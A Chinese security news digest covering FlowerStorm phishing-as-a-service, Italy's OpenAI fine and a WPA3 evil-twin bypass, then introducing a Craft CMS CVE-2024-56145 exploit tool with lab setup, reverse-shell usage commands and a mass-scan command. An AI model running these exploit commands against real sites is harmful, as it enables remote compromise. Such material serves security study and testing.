网安瞭望台第17期:Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析

news2024/12/24 6:45:03

国内外要闻

Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析

    在网络安全的复杂战场中,近期出现了一个值得关注的动态:名为 Rockstar 2FA 的钓鱼即服务(PhaaS)工具包遭遇变故,意外推动了另一个新生服务 FlowerStorm 的猖獗扩张。

    据 Sophos 上周发布的新报告指出,运营 Rockstar 2FA 服务的团体似乎经历了至少部分基础设施的崩溃,与该服务相关的页面已无法访问。“这并非由于执法取缔行动,而是服务后端出现了一些技术故障。” 上月末,Trustwave 首次记录了 Rockstar 2FA,它作为一种 PhaaS 服务,能让不法分子发起钓鱼攻击,窃取微软 365 账户凭据和会话 cookie,绕过多重身份验证(MFA)保护。该服务被评估为 DadSec 钓鱼工具包的更新版本,微软以 Storm - 1575 之名对其追踪,多数钓鱼页面托管于.com、.de、.ru 和.moscow 顶级域名,不过.ru 域名的使用据信已随时间减少。

图片

    2024 年 11 月 11 日,Rockstar 2FA 似乎遭遇技术中断,转向中间诱饵页面时引发 Cloudflare 超时错误,伪造登录页面无法加载。虽然尚不清楚中断缘由,但此 PhaaS 工具包留下的空白,致使与 FlowerStorm 相关的钓鱼活动激增。FlowerStorm 至少自 2024 年 6 月起就已活跃,Sophos 称,二者在钓鱼门户页面格式及连接后端服务器窃取凭据的方法上存在相似之处,暗示可能有共同起源,且都滥用 Cloudflare Turnstile 防止页面请求来自机器人。有人怀疑 11 月 11 日的中断,要么代表其中一个团体的战略转向,要么是运营人员变动,抑或是有意拆分两项业务,现阶段尚无确凿证据将二者关联。

    使用 FlowerStorm 最频繁的目标国家包括美国、加拿大、英国、澳大利亚、意大利、瑞士、波多黎各、德国、新加坡和印度。Sophos 表示:“受攻击最严重的行业是服务业,尤其聚焦于提供工程、建筑、房地产、法律服务与咨询的公司。” 这些发现再次凸显出一种持续趋势:攻击者即便无需深厚技术专长,也能利用网络犯罪服务和通用工具大规模发动网络攻击,这为网络安全防护敲响了警钟,各方需进一步加强防范与监测,以应对此类不断演变的威胁。

图片

意大利因 ChatGPT 违反 GDPR 数据隐私规定对 OpenAI 罚款 1500 万欧元

    在数据隐私备受瞩目的当下,意大利的数据保护机构对 ChatGPT 的开发者 OpenAI 开出了高达 1500 万欧元(约合 1566 万美元)的罚单,原因是这款生成式人工智能应用在处理个人数据方面存在诸多问题。

    早在近一年前,意大利数据保护机构(Garante)就发现 ChatGPT 在违反欧盟《通用数据保护条例》(GDPR)的情况下,使用用户信息来训练其服务。该机构指出,OpenAI 未就 2023 年 3 月发生的安全漏洞向其通报,并且在没有充分法律依据的情况下,使用用户的个人信息来训练 ChatGPT。同时,还指责该公司违背了透明度原则以及对用户的相关信息告知义务。

    此外,Garante 表示:“OpenAI 也未设立年龄验证机制,这可能会使 13 岁以下儿童面临接触与其发展程度和自我认知不符的不当回应的风险。” 除了罚款,OpenAI 还被要求开展为期六个月的宣传活动,通过广播、电视、报纸以及互联网等渠道,增进公众对 ChatGPT 运作方式的了解。

    具体而言,要让公众知晓其为训练模型所收集的数据(包括用户和非用户信息)的性质,以及用户可用来反对、更正或删除这些数据的权利。Garante 补充道:“通过这次宣传活动,ChatGPT 的用户和非用户都必须清楚如何阻止生成式人工智能使用他们的个人数据进行训练,从而切实保障他们在 GDPR 下的权利。”

    意大利曾在 2023 年 3 月下旬率先以数据保护担忧为由,对 ChatGPT 实施了临时禁令。近一个月后,在 OpenAI 解决了 Garante 提出的相关问题后,ChatGPT 才恢复访问。OpenAI 在发给美联社的一份声明中称,这一处罚决定并不合理,其打算提起上诉,称该罚款金额几乎是其在意大利那段时期营收的 20 倍。同时,它还表示致力于提供有益且尊重用户隐私权的人工智能。

    此次裁决出台之前,欧洲数据保护委员会(EDPB)曾提出一种观点,即非法处理个人数据但在部署前已进行匿名化处理的人工智能模型,并不构成违反 GDPR 的行为。该委员会表示:“如果能够证明人工智能模型后续的运行不涉及个人数据处理,那么 EDPB 认为 GDPR 并不适用。因此,初始处理的非法性不应影响模型后续的运行。”

    而且,EDPB 还认为,当控制者在模型匿名化后,对部署阶段收集的个人数据进行后续处理时,GDPR 将适用于这些处理操作。本月早些时候,该委员会还发布了关于以符合 GDPR 的方式处理向非欧洲国家进行数据转移的指南,这些指南将接受公众咨询,截止日期为 2025 年 1 月 27 日,并指出 “第三国当局的判决或决定不能在欧洲自动得到认可或执行。如果一个组织响应第三国当局对个人数据的请求,这种数据流动就构成了转移,GDPR 就会适用。”

图片

WPA3 网络密码遭中间人攻击与社会工程学手段绕过

    在网络安全领域,近期研究有了令人担忧的发现:研究人员成功地通过结合中间人(MITM)攻击和社会工程学技术,绕过了 Wi-Fi 保护访问 3(WPA3)协议以获取网络密码。

    来自西印度群岛大学的凯尔・查迪、韦恩・古德里奇和科夫卡・汗开展的此项研究,凸显了最新无线安全标准中潜在的漏洞。WPA3 于 2018 年推出,旨在弥补其前身 WPA2 的缺陷,并为 Wi-Fi 网络提供更强的安全性。其关键特性之一是对等同时认证(SAE)协议,旨在使密码能抵御离线字典攻击。

    然而,研究人员证明可以利用 WPA3 过渡模式中的弱点,该模式用于与 WPA2 设备向后兼容。通过利用降级攻击,他们能够捕获部分 WPA3 握手信息,然后结合社会工程学技术来恢复网络密码。

图片

    攻击方法主要包含三个主要步骤:首先,使用降级攻击捕获握手信息;其次,将用户从原始 WPA3 网络中解除认证;最后,创建一个带有强制门户的 “恶意双胞胎” 接入点以获取密码。研究人员使用树莓派来模拟 WPA3 接入点,并利用 Airgeddon 等开源工具来创建恶意接入点和强制门户。当毫无防备的用户尝试连接到虚假网络时,会被提示输入 Wi-Fi 密码,然后该密码会与捕获的握手信息进行验证。

图片

    这项研究引发了对 WPA3 安全性的担忧,尤其是其过渡模式。研究发现,当未实施受保护管理帧(这是许多用户可能未意识到或未启用的设置)时,攻击能够成功。有趣的是,研究人员还发现一些设备无法连接到 WPA3 过渡网络,这与 Wi-Fi 联盟声称的与 WPA2 的向后兼容性相矛盾。

    虽然该攻击需要特定条件和用户交互,但它表明了保护无线网络面临的持续挑战。研究人员强调了用户教育以及正确配置 WPA3 网络以减轻此类风险的重要性。网络安全专家呼吁对 WPA3 的漏洞进行进一步调查,并开发更多的防护措施。由于 Wi-Fi 网络对于企业和个人而言都是关键基础设施,确保其安全性至关重要。

    这项研究的结果提醒人们,即使是最先进的安全协议也可能容易受到技术漏洞利用和社会工程学巧妙组合的攻击。随着 WPA3 采用率的增加,用户和制造商都必须保持警惕,并实施最佳实践以保护无线网络免受潜在攻击。研究团队计划继续开展工作,探索更多漏洞并开发对策,以增强 WPA3 和未来无线协议的安全性。他们的努力有助于在不断演变的数字安全环境中,网络安全专业人员与潜在攻击者之间持续的对抗。

图片

知识分享

CVE-2024-56145: Craft CMS 漏洞利用工具介绍

一、工具背景与用途

    这款工具旨在利用 Craft CMS 中存在的一个漏洞,该漏洞是由 Assetnote 出色的研究团队所发现的。这个漏洞源于对用户提供的模板路径处理不当,使得攻击者能够通过特制的有效载荷实现远程代码执行(RCE)。

二、工具特点

  1. 自动化 FTP 服务器:具备自动化的 FTP 服务器功能,可用于提供恶意的有效载荷,方便攻击者实施相关攻击行为。

  2. 多种反向 shell 有效载荷生成:支持生成多种类型(如 bash、nc、mkfifo 等)的反向 shell 有效载荷,使用者可根据具体需求进行选择,增加了攻击手段的灵活性。

  3. 漏洞检查功能:提供漏洞检查器,能够识别存在此漏洞的易受攻击目标,有助于攻击者筛选合适的攻击对象,也方便安全人员提前排查隐患。

  4. 多线程支持:支持多线程运行,能够实现更快的扫描速度,在面对大量目标时可以有效提高检测或攻击的效率。

  5. 易用的 CLI 界面:拥有清晰易用的命令行界面(CLI),操作过程中会给出明确的反馈信息,无论是专业安全人员还是有一定基础的使用者都能较方便地操作该工具。

三、搭建易受攻击的测试环境(设置漏洞测试实验室)

    若要设置用于测试目的的 Craft CMS 实例,可按照以下步骤进行操作:

  1. 首先创建相关目录并进入:

mkdir exploit-craft && \cd exploit-craft && \

2. 配置 DDEV 项目用于 Craft CMS:

ddev config \  --project-type=craftcms \  --docroot=web \  --create-docroot \  --php-version="8.2" \  --database="mysql:8.0" \  --nodejs-version="20" && \

3. 创建 DDEV 项目:

ddev start -y && \

4. 创建指定版本的 Craft CMS:

ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \

5. 安装特定的 CMS 版本:

ddev composer require "craftcms/cms:5.5.0" \  --no-scripts \  --no-interaction --with-all-dependencies && \

6. 设置 Craft CMS 的安全密钥:

ddev craft setup/security-key && \

7. 安装 Craft CMS:

ddev craft install/craft \    --username=admin \    --password=password123 \    --email=admin@example.com \    --site-name=Testsite \    --language=en \    --site-url='$DDEV_PRIMARY_URL' && \

8. 为 PHP 启用 register_argc_argv:

mkdir -p.ddev/php/ && \echo "register_argc_argv = On" >.ddev/php/php.ini && \ddev restart && \

9. 最后输出提示信息并启动项目:​​​​​​​

echo 'Nice, ready to launch!' && \ddev launch

四、工具使用方法

查看帮助信息:
运行工具时添加 --help 标志,就能查看可用的命令,命令格式如下:

python exploit.py --help

利用命令(Exploit Command):

若要利用某个目标的漏洞,使用以下命令格式:

python exploit.py exploit -u <TARGET_URL> -lh <LOCAL_HOST> -lp <LOCAL_PORT> -px <PAYLOAD_TYPE>

各参数含义如下:

-u 或 --url:指定目标 URL,此参数是必需的。-lh 或 --lhost:用于接收反向 shell 的本地 IP,也是必需参数。-lp 或 --lport:本地用于监听的端口,同样为必需项。-fh 或 --ftp-host:FTP 服务器主机地址。-fp 或 --ftp-port:FTP 服务器端口号。-px 或 --payload:有效载荷类型(可选 bash、nc、mkfifo 等),默认值为 bash。​​​​​​
例如:python exploit.py exploit -u https://example.com -lh 192.168.1.10 -lp 4444 -fh 127.0.0.1 -fp 2121 -px bash

检查命令(Check Command)

python exploit.py check -u <TARGET_URL> -f <FILE_WITH_URLS> -t <THREADS> -o <OUTPUT_FILE>

各参数含义如下:​​​​​​​

-u 或 --url:单个目标 URL。-f 或 --file:包含多个要扫描的 URL 的文件。-t 或 --threads:用于扫描的并发线程数量。-o 或 --output:用于保存结果的输出文件。

例如:

python exploit.py check -f urls.txt -t 10 -o results.txt

    最后需要强调的是,应秉持负责任、符合道德的态度来使用这款工具,该工具的代码仓库地址为

 https://github.com/Chocapikk/CVE-2024-56145,使用者可前往获取更多详细内容。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2264586.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

aws(学习笔记第十九课) 使用ECS和Fargate进行容器开发

aws(学习笔记第十九课) 使用ECS和Fargate进行容器开发 学习内容&#xff1a; 使用本地EC2中部署docker应用使用ECS的EC2模式进行容器开发使用ECS的Fargate模式进行容器开发 1. 使用本地EC2中部署docker应用 docker整体 这里展示了docker的整体流程。 开发阶段 编写dockerfile…

【Python 图片下载器】一款专门为爬虫制作的图片下载器,多线程下载,速度快,支持续传/图片缩放/图片压缩/图片转换

文章日期&#xff1a;2024.12.23 使用工具&#xff1a;Python 本章知识&#xff1a;制作一款图片下载器_DOS窗口&#xff08;爬虫专用&#xff09; 文章难度&#xff1a;低等&#xff08;没难度&#xff09; 文章全程已做去敏处理&#xff01;&#xff01;&#xff01; 【需要…

关于博客系统的自动化功能测试报告

1.项目背景 基于 SSM 的个人博客系统测试 博客系统采用前后端分离的方法来实现&#xff0c;同时使用了数据库来存储相关的数据&#xff0c;前端主要有四个页面构成:登录页、列表页、详情页以及编辑页&#xff0c;模拟实现了个人博客列表页面&#xff0c;其结合后端实现了以下的…

计算机的错误计算(一百八十九)

摘要 用大模型计算 tan(12.345) . 自变量取弧度。结果保留10位有效数字。不同于前面两节的大模型&#xff0c;本节调用了新的两个大模型。然而&#xff0c;很遗憾&#xff0c;它们给出的答案似乎仍然是“匹配”出来的&#xff0c;不是计算出来的。当然&#xff0c;均是错误的。…

IP地址数据信息和爬虫拦截的关联

IP地址数据信息和爬虫拦截的关联主要涉及到两方面的内容&#xff0c;也就是数据信息和爬虫。IP 地址数据信息的内容丰富&#xff0c;包括所属地域、所属网络运营商、访问时间序列、访问频率等。 从IP地址信息中可以窥见多样的数据&#xff0c;那么我们应该怎么利用IP地址信息来…

springboot+logback学习文档

目录 1、前提说明2、引入依赖、将logback配置文件打到classes下2.1、引入依赖2.2、将logback配置文件打到classes下 3、使用说明3.1、配置文件名称和位置3.2、常规用法3.2.1、property标签&#xff08;普通变量&#xff09;3.2.2、springProperty标签&#xff08;spring变量&am…

Laya ios接入goole广告,开始接入 2

开始使用 | iOS | Google for Developers 谷歌广告的官网&#xff0c;需要搭梯子&#xff0c;API你说详细吧&#xff0c;也就那样&#xff0c;主要是没接过 一步步来吧 0.laya导包 前端出包原生 screenorientation 全部 portrait&#xff0c;我这个是竖屏的 注意这个&a…

详解js柯里化原理及用法,探究柯里化在Redux Selector 的场景模拟、构建复杂的数据流管道、优化深度嵌套函数中的精妙应用

目录 详解js柯里化原理及用法&#xff0c;探究柯里化在Redux Selector 的场景模拟、构建复杂的数据流管道、优化深度嵌套函数中的精妙应用 一、什么是柯里化&#xff1f; 1、原理解析 2、一个直观的例子 二、如何实现柯里化&#xff1f; 1、底层实现 2、工作原理解析 3…

EDGE浏览器每次关闭时再次打开保存的密码就消失如何解决

文章目录 EDGE浏览器每次重启的时候保存的密码都消失如何解决&#xff1f; 打开EDGE浏览器点击三个点 点击设置 点击隐私、搜索和服务 找到选择每次关闭浏览器时要清除的内容 将开启的关闭即可

数据流图和流程图的区别

在结构化建模中&#xff0c;数据流图和流程图都是非常重要的工具&#xff0c;它们为开发人员提供了强大的手段来分析和设计系统。尽管两者在表面上看起来有些相似&#xff0c;但它们在功能、用途和表达方式上存在显著的区别。本文将详细探讨数据流图和流程图的区别&#xff0c;…

云计算中的容器技术(如Docker)是什么?

今天想和大家聊聊容器技术&#xff0c;特别是Docker这个大家可能经常听到的名词。记得我刚接触容器技术时也觉得挺抽象的&#xff0c;让我用简单的比喻来说明吧。 想象一下你在搬家。传统方式是把所有家具、电器分散装车&#xff0c;到了新家还要重新组装、调试。这就像我们以…

《Opencv》基础操作详解(2)

接上篇&#xff1a;《Opencv》基础操作详解&#xff08;1&#xff09;-CSDN博客 目录 Opencv基础操作 11、B、G、R颜色通道提取 12、显示单个通道颜色 13、 合并颜色通道 14、图像添加马赛克 15、图片区域替换 16、图片的缩放&#xff08;常用&#xff09; 17、图像运算…

STM32——“SPI Flash”

引入 在给单片机写程序的时候&#xff0c;有时会用到显示屏&#xff0c;就拿市面上的0.96寸单色显示器来说&#xff0c;一张全屏的图片就占用8x1281024个字节&#xff0c;即1kb的空间&#xff0c;这对于单片机来说确实有点奢侈&#xff0c;于是我买了一个8Mb的SPI Flash&#x…

深入浅出:AWT的基本组件及其应用

目录 前言 1. AWT简介 2. AWT基本组件 2.1 Button&#xff1a;按钮 2.2 Label&#xff1a;标签 ​编辑 2.3 TextField&#xff1a;文本框 2.4 Checkbox&#xff1a;复选框 2.5 Choice&#xff1a;下拉菜单 2.6 List&#xff1a;列表 综合案例 注意 3. AWT事件处理 …

Flutter组件————PageView

PageView 可以创建滑动页面效果的widget&#xff0c;它允许用户通过水平或垂直滑动手势在多个子页面&#xff08;child widgets&#xff09;之间切换。每个子页面通常占据屏幕的全部空间。 参数 参数名类型描述childrenList<Widget>包含在 PageView 中的所有子部件&am…

三种电子画册制作方法

今天教大家三种电子画册的制作方法&#xff0c;很容易上手&#xff0c;需要的赶紧收藏起来 一、 利用在线平台--FLBOOK 1.注册并登录在线平台。 2.选择喜欢的模板&#xff0c;根据需求进行修改 3.批量上传PDF文件一键转换H5翻页电子画册 4.添加图片、文字等元素&#xff0c…

以太坊账户详解

文章目录 一、账户基本概念1.1 外部账户1.2 合约账户1.3 差异对比 二、帐户创建2.1 外部账户创建2.2 合约账户创建 三、账户数据结构3.1 账户状态3.2 账户状态结构 对比比特币的 “UTXO” 余额模型&#xff0c;以太坊使用“账户”余额模型。 以太坊丰富了账户内容&#xff0c;除…

AWS Transfer 系列:简化文件传输与管理的云服务

在数字化转型的今天&#xff0c;企业对文件传输、存储和管理的需求日益增长。尤其是对于需要大量数据交换的行业&#xff0c;如何高效、可靠地传输数据成为了一大挑战。为了解决这一难题&#xff0c;AWS 提供了一系列的文件传输服务&#xff0c;统称为 AWS Transfer 系列。这些…

基础I/O -> 如何谈文件与文件系统?

文件的基础理解 空文件也要在磁盘上占据空间。文件 文件内容文件属性。文件操作 对内容的操作 对属性的操作或者是对内容和属性的操作。标定一个文件&#xff0c;必须使用&#xff1a;文件路径 文件名&#xff08;具有唯一性&#xff09;。如果没有指明对应的文件路径&…

网络安全检测

实验目的与要求 (1) 帮助学生掌握木马和入侵的防护和检测方法、提高学习能力、应用能力和解决实际问题的能力。 (2) 要求学生掌握方法, 学会应用软件的安装和使用方法, 并能将应用结果展示出来。 实验原理与内容 入侵检测是通过对计算机网络或计算机系统中若干关键点收集信…